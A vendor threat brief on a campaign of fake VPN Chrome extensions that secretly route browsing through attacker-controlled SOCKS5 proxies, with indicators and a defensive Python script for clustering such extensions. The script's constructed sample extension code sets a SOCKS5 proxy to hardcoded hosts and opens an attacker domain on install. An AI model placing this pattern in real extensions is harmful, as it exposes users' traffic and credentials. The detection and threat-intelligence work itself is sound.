Browser Threat Brief: Fake VPN Extensions Turn Browser Privacy Tools Into Traffic Interception Risk

By: Almas Raza

Browser extensions are often installed to improve productivity, security, or privacy. But when attackers abuse that trust, the browser itself can become the attack surface.

Palo Alto Networks researchers identified a fake VPN extension farm involving dozens of Chrome extensions operated by a single threat actor. These extensions appeared to provide VPN functionality, but instead routed user browsing traffic through 15 hardcoded SOCKS5 proxy servers under the threat actor’s control. At least four of the extensions directly impersonated major legitimate VPN brands, including AdGuard VPN, Proton VPN, BrowSec VPN, and HideMyName VPN, to deceive users looking for trusted privacy tools.

This blog explains how the attack works, what the extension code revealed, why this campaign appears larger than a single bad extension, and what organizations can do to reduce exposure.

Note: This finding was originally shared through Palo Alto Networks Unit 42 Timely Threat Intelligence, which provides additional research context.

Threat at a Glance

| Area | Details |
| --- | --- |
| Threat Type | Fake VPN Chrome extension campaign |
| Delivery Method | Marketplace-distributed extensions |
| User Action | User installs a VPN extension believing it provides privacy protection |
| Attack Goal | Route browsing traffic through attacker-controlled SOCKS5 proxy servers |
| Key Risk | Traffic interception, URL visibility, credential exposure over HTTP, and traffic manipulation |
| Notable Indicator | sverchtun[.]store |
| Detection Opportunity | Extension analysis, URL detection, DNS detection, runtime browser behavior |

How the Attack Works

Step 1: User Searches for a Trusted VPN Tool

The attack begins with a user looking for a VPN extension to protect their browsing activity. The user finds what appears to be a legitimate privacy tool, which makes the lure especially effective because VPN extensions are commonly associated with security, privacy, and safer web access.

In this campaign, the threat actor created dozens of fake VPN Chrome extensions, including extensions that impersonated well-known VPN brands. This gave the extensions a credible appearance and increased the likelihood that users would install them.

Step 2: The Extension Appears Legitimate and Gains Trust

The extensions used familiar VPN branding, Chrome Store identities, and extension-style packaging that looked like normal browser software.

The threat actor also used multiple Chrome Store publisher identities, with each identity associated with multiple VPN extensions. This helped the campaign scale and made it harder to connect the extensions back to a single operator based on publisher information alone.

Step 3: The Extension Takes Control of Browser Traffic Settings

After installation, the extension gains the ability to modify how the browser routes web traffic. For a VPN extension, this may appear expected because users assume the tool needs network-level access to provide privacy protection.

In this case, that trusted access is abused. Instead of connecting users to a legitimate VPN service, the extension uses browser proxy settings to redirect traffic through infrastructure controlled by the threat actor.

Step 4: Browser Traffic Is Routed Through Attacker-Controlled Proxies

Once the proxy configuration is applied, the extension routes browser traffic through attacker-controlled SOCKS5 proxy servers instead of a trusted VPN service.

Instead of protecting the user’s browsing activity, the fake VPN extension creates a new interception point. Because it does not provide actual VPN encryption, the threat actor can observe all browsing activity, including every visited URL and HTTP credentials.

Step 5: Impact on the User or Organization

These fake VPN extensions create the opposite of the privacy protection users expect. By routing browser traffic through attacker-controlled SOCKS5 proxies, they can expose visited URLs, HTTP credentials, and sensitive browser activity to the threat actor.

For organizations, the risk is broader than one user installing a bad extension. Enterprise work now happens in the browser across SaaS applications, webmail, collaboration tools, internal portals, and AI services. A malicious extension with control over browser traffic can turn routine web activity into an opportunity for data exposure, credential theft, and traffic manipulation.

What the Extension Code Revealed

The code analysis showed that these fake VPN extensions were not isolated, one-off extensions. They were part of a connected extension cluster that reused the same infrastructure and followed the same core behavior across multiple Chrome Store listings.

Every extension contained the same server list embedded in its service worker JavaScript. Although the threat actor used three different code templates with different variable names, all templates shared the same proxy IP list and the same sverchtun[.]store domain. They also performed the same core actions: calling `chrome.proxy.settings.set()` with a SOCKS5 configuration and storing the selected proxy server in memory.

This shared code, infrastructure, and behavior helped connect the extensions to the same broader fake VPN operation. The use of different templates and variable names may have been intended to make the extensions appear different during review, but the underlying functionality remained the same.

The code also revealed first-install behavior that did not align with the extensions’ stated purpose. Each extension was configured to automatically open `hxxps://sverchtun[.]store/` when installed, without user consent. This redirect was hardcoded in the service worker’s `onInstalled` handler and pointed users to a fake monetization website that did not match what the VPN extensions were actually doing.

Why This Is Hard to Detect

Fake VPN extensions can be difficult to detect because their behavior may appear related to their stated purpose. A VPN extension changing proxy settings may not look suspicious at first glance, especially if the extension is presented as a privacy tool.

The problem is that Chrome Store presence and familiar branding do not always guarantee safety. Threat actors can use marketplace signals and privacy-focused messaging to make an extension appear legitimate while the extension’s actual behavior tells a different story.

This is why extension security cannot rely only on first-time installation checks or marketplace metadata. Risk can appear through publisher behavior, shared infrastructure, code similarity, update activity, runtime behavior, and whether the extension’s actual behavior matches its stated purpose.

URL intelligence also plays an important role in detecting these threats. Browser extensions often depend on external infrastructure, including domains, redirect pages, fake monetization sites, proxy services, and attacker-controlled infrastructure. Correlating extension behavior with URL and domain intelligence can help identify suspicious infrastructure reuse and connect seemingly separate extensions to the same broader campaign.
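As an added example (not code from the Unit 42 research or from the extensions themselves), the Python triage script below applies the two signals discussed in "What the Extension Code Revealed" and in this section: it extracts hardcoded proxy endpoints and contacted domains from extension service-worker sources, flags SOCKS5 proxy configuration and first-install redirects, and clusters extensions that reuse the same infrastructure even when their variable names differ. The sample sources, the proxy IP addresses, and the helper names are constructed assumptions; only the sverchtun[.]store domain comes from the report.

```python
import re
from collections import defaultdict
# Constructed sample service-worker sources (not the real extension code): three
# "templates" with different variable names sharing one proxy list and one
# first-install redirect, plus a benign control. IPs are RFC 5737 test addresses.
SAMPLES = {
    "ext_a": '''const srv=["198.51.100.10:1080","198.51.100.11:1080"];let cur=srv[0];
chrome.runtime.onInstalled.addListener(()=>{chrome.tabs.create({url:"https://sverchtun[.]store/"})});
chrome.proxy.settings.set({value:{mode:"fixed_servers",rules:{singleProxy:{scheme:"socks5",host:cur.split(":")[0],port:1080}}},scope:"regular"});''',
    "ext_b": '''var nodes=["198.51.100.11:1080","198.51.100.10:1080"];var picked=nodes[1];
chrome.runtime.onInstalled.addListener(function(){chrome.tabs.create({url:"https://sverchtun[.]store/"})});
chrome.proxy.settings.set({value:{mode:"fixed_servers",rules:{singleProxy:{scheme:"socks5",host:picked.split(":")[0],port:1080}}}});''',
    "ext_c": '''let endpoints=["198.51.100.10:1080"];
chrome.proxy.settings.set({value:{mode:"fixed_servers",rules:{singleProxy:{scheme:"socks5",host:endpoints[0].split(":")[0],port:1080}}}});''',
    "benign": '''chrome.runtime.onInstalled.addListener(()=>{chrome.storage.local.set({ready:true})});''',
}
IP_PORT = re.compile(r'\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{2,5})\b')
URL = re.compile(r'https?://([a-z0-9\-\[\]\.]+)', re.I)

def extract_infra(src):
    """Hardcoded proxy endpoints and contacted domains (defanged '[.]' normalised)."""
    proxies = {f"{ip}:{port}" for ip, port in IP_PORT.findall(src)}
    domains = {d.replace("[.]", ".").lower() for d in URL.findall(src)}
    return {"proxies": proxies, "domains": domains}

def flags(src):
    """Behaviours a reviewer would want surfaced for an extension sold as a VPN."""
    out = []
    if "chrome.proxy.settings.set" in src and '"socks5"' in src:
        out.append("sets SOCKS5 proxy via chrome.proxy.settings.set")
    if "onInstalled" in src and "chrome.tabs.create" in src and URL.search(src):
        out.append("opens external URL on install")
    return out

def cluster_by_infra(sources):
    """Group extensions that share any proxy endpoint or domain (union-find)."""
    parent = {k: k for k in sources}
    def find(x):
        while parent[x] != x:
            x = parent[x]
        return x
    owner = {}  # infrastructure item -> first extension seen using it
    for ext, src in sources.items():
        infra = extract_infra(src)
        for item in infra["proxies"] | infra["domains"]:
            rep = owner.setdefault(item, ext)   # no-op merge when ext owns it
            parent[find(ext)] = find(rep)
    groups = defaultdict(set)
    for ext in sources:
        groups[find(ext)].add(ext)
    return sorted((sorted(g) for g in groups.values()), key=lambda g: g[0])
```

Running `cluster_by_infra(SAMPLES)` groups the three templates together on their shared proxy list and domain and leaves the benign control on its own, which is the same linkage the report drew across the three code templates.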

 

How Palo Alto Networks Helps Protect Customers

Palo Alto Networks helps organizations reduce browser extension risk with Advanced Extension Security in Prisma Browser, providing protection across the full extension lifecycle: installation, updates, runtime behavior, and remediation.

Prisma Browser Advanced Extension Security analyzes extension metadata, permissions, publisher reputation, source code, API calls, network activity, and runtime behavior. For fake VPN extensions, this helps identify signals such as proxy manipulation, suspicious infrastructure reuse, brand impersonation, repeated code templates, and behavior that does not match the extension’s stated purpose.

Advanced Extension Security is also strengthened by intelligence from Palo Alto Networks cloud-delivered security services, helping correlate extension behavior with suspicious domains, redirect infrastructure, proxy services, and attacker-controlled web infrastructure.

When an extension is determined to be risky or malicious, Prisma Browser can take policy-based action, including blocking installation, preventing risky updates, notifying users, and automatically removing malicious extensions.

Conclusion

This campaign shows how attackers can abuse the trust users place in browser privacy tools. A fake VPN extension does not need to behave like traditional malware to create meaningful risk. By controlling browser proxy settings, it can turn normal browsing activity into an opportunity for traffic interception, visibility into visited URLs, and potential credential exposure.

As more enterprise work moves into the browser, extensions have become a powerful part of the user environment. Organizations need visibility beyond the initial install to understand how extensions behave during updates and at runtime.

Advanced Extension Security with Prisma Browser helps close this gap by analyzing extensions across installation, updates, runtime behavior, and remediation. This lifecycle approach helps organizations identify extensions that look legitimate on the surface but introduce real security and privacy risk once they operate inside the browser.

Indicators

The table below lists selected fake VPN Chrome extensions from this campaign, with the brand each one impersonated:

| Extension ID | Name | Impersonation Target |
| --- | --- | --- |
| kfhghjkddbnaphdgnajhenaacpekbdmg | AdGuard VPN | AdGuard Ltd. |
| mocbcncbleebmmnmhafgppnaocmpafne | Proton VPN | Proton Technologies AG |
| oapdfflamjpbpphjjlmejjgljiiajkcf | BrowSec VPN | Browsec LLC |
| jageecdigmlcciccgcbifiidgfoafjke | HideMyName VPN | HideMy.name |
| beadcellenlepfbkpoggklacilaealbb | RAdmin VPN | Radmin (Famatech) |
| cjdafpdojamncegfmbconlicklgepidc | Amnezia VPN | AmneziaVPN |
| emnggacgjccpjhphgochediffoijlokc | Planet VPN | Planet VPN |
| jjbjcelpjgagfgdpobjkpjnkhffmnlda | Sota VPN | (Invented Brand) |
| cmfbmehojkikkfdellcpieaapccgemdl | Happ VPN | (Invented Brand) |
| bmmklkcamkknmajnhcmigbhgpahapodk | Paper VPN | (Invented Brand) |
| iooeakemgpdekfapiejcmolppjfggide | Window VPN | (Invented Brand) |
| chlkfcilfifdlmlmjinjeinpibgpegap | Hit VPN | (Invented Brand) |
| ckhgbopnpmlhgiihmclcobcdehcakoai | BrowSec VPN | Browsec LLC |
| dgkglcdncbenpdookdibjmigcdpkebne | AdGuard VPN | AdGuard Ltd. |
| cjhkcmdhkdjgdmgldfaggkjcomhoeeen | Happ VPN | (Invented Brand) |
| jfllfbeekighpbpaijppangggdjocjhi | Start VPN | (Invented Brand) |
| hcgpmejdbeacmcplmkmlhadhjhjblfhc | Proton VPN | ProtonVPN |
| hjbbeolgpbjijbddofkdiejblagpfhig | Ramdin VPN | Radmin (Famatech) |

Additional Information

To see Advanced Extension Security in action, schedule a Prisma Browser demo with your Palo Alto Networks team.
